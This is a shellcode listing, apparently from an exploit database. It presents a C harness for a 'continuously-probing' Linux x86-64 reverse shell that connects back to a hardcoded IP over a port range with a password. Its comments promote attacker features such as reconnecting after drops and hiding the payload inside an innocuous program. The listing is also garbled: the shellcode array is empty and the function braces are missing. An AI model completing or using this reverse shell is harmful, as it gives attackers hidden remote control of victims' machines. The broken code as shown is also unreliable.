Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes

Author: CripSlick Published: 2016-07-12 Verified: Verified



#include <stdio.h>
#include <string.h>
// Exploit Title: [Continuously-Probing Reverse Shell via Socket + port-range + password (172 bytes)]
// Date: [07/10/2016]
// Exploit Author: [CripSlick]
// Tested on: [Kali 2.0]
// Version: [No program being used or exploited; I only relied on syscalls]
// =====================  Why use Da LaCrips Reverse Shell??  =============================
// 1. The victim can lauch the payload and THEN you can connect (unlike
//    every other reverse shell where you must be ready for the connection ahead of time)
// 2. You get multiple ports (that means multiple terminals can run on a single victim)
// 3. If your connection/port gets disconnected, you can accept that port connection right back again
// 4. You will be able to access any linux system disto via syscalls
// 5. You you get a password and easy to change variables
// 6. You can easily link it to an innocuous program sense the terminal closes via fork after launch
//    ENJOY!!
//OffSec ID: OS-20614
#define IPv4        "\x0a\x01\x01\x04"  //in forward-byte-order
#define High_Port   "\x8f\x01" //399    //in reverse-byte-order
#define Low_Port    "\x86\x01" //390    //in reverse-byte-order
// python + import socket + hex(socket.htons(<Port_Number>))
#define Password    "\x6c\x61\x20\x63\x72\x69\x70\x73"  // in forward-byte-order
// Default Password = 'la crips' without quotes
// python + '<password>'[::1].encode('hex')
// you can use complex ascii characters
// example: \x21\x40\x20\x3C\x52\x7C\x70\x24 = !@ <R|p$
// Port-Note 1/2:   your Low_port will NOT be hit,
//                  only the 2nd lowest to the highest will return to you
//                  example of using only one port
//                  High_Port = 399 & Low_Port = 389 = only port 399
// Port-Note 2/2:   If you have over a hunder ports to prob, there may be some delay
unsigned char code[] =
int main ()
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %d Bytes Long\n", strlen(code));
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
    __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
        "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
        "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
        "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
        "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
        "call code");
    return 0;